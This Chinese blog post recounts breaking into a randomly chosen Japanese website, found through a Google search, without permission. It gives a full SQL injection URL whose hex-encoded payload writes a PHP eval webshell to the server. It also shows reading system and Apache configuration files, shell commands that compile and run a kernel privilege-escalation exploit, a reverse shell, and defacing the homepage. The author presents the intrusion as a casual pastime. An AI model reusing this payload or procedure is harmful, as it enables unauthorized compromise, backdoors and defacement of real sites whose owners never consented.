Mysql注入拿shell一例

晚上无聊，google：site:.jp，随便找了个目标试试，发现有注入，如下图：

直接丢穿山甲里注吧：

看着是root，可以读“/etc/passwd”，找apache的配置文件读下看看吧，找到了http.conf文件“/etc/httpd/conf/httpd.conf”，然后找到了网站路径：

用穿山甲的写文件功能无法导出shell，让我一阵蛋疼，只能手工试试了，使用下面的命令导出：

http://localhost/news/detail.php?news_seq=7069%20and%201=2%20union%20select%200,0x3C3F70687020406576616C28245F504F53545B276273275D293B3F3E,0,0,0,0,0,0,0,0,0,0,0 INTO OUTFILE ‘/tmp/t.txt’%20–

然后读了下“/tmp/t.txt”，有内容，之后将路径修改成网站路径“/var/www/html/”，发现无法导出，让我一阵郁闷，之后想到了导出到子目录“/var/www/html/news/”，成功导出一句话，菜刀连接之，然后想改个主页，发现没权限，www根目录下没任何权限，之后子目录中可以修改，这有鸟用么….

之后使用uname -a查看下内核版本提权用：

将文件改名成c然后执行下面的命令：

cp /var/www/html/news/2.6.18.txt /tmp/test.c
cd /tmp
gcc test.c -o test
chmod +x test
./test

2.6.18.txt

不过在菜刀下无法溢出，只能反弹了，找了个r57shell自带反弹功能，反弹个shell之后改下网站目录权限改主页之：

转载请注明: 本文《Mysql注入拿shell一例》来源于bstaint的博客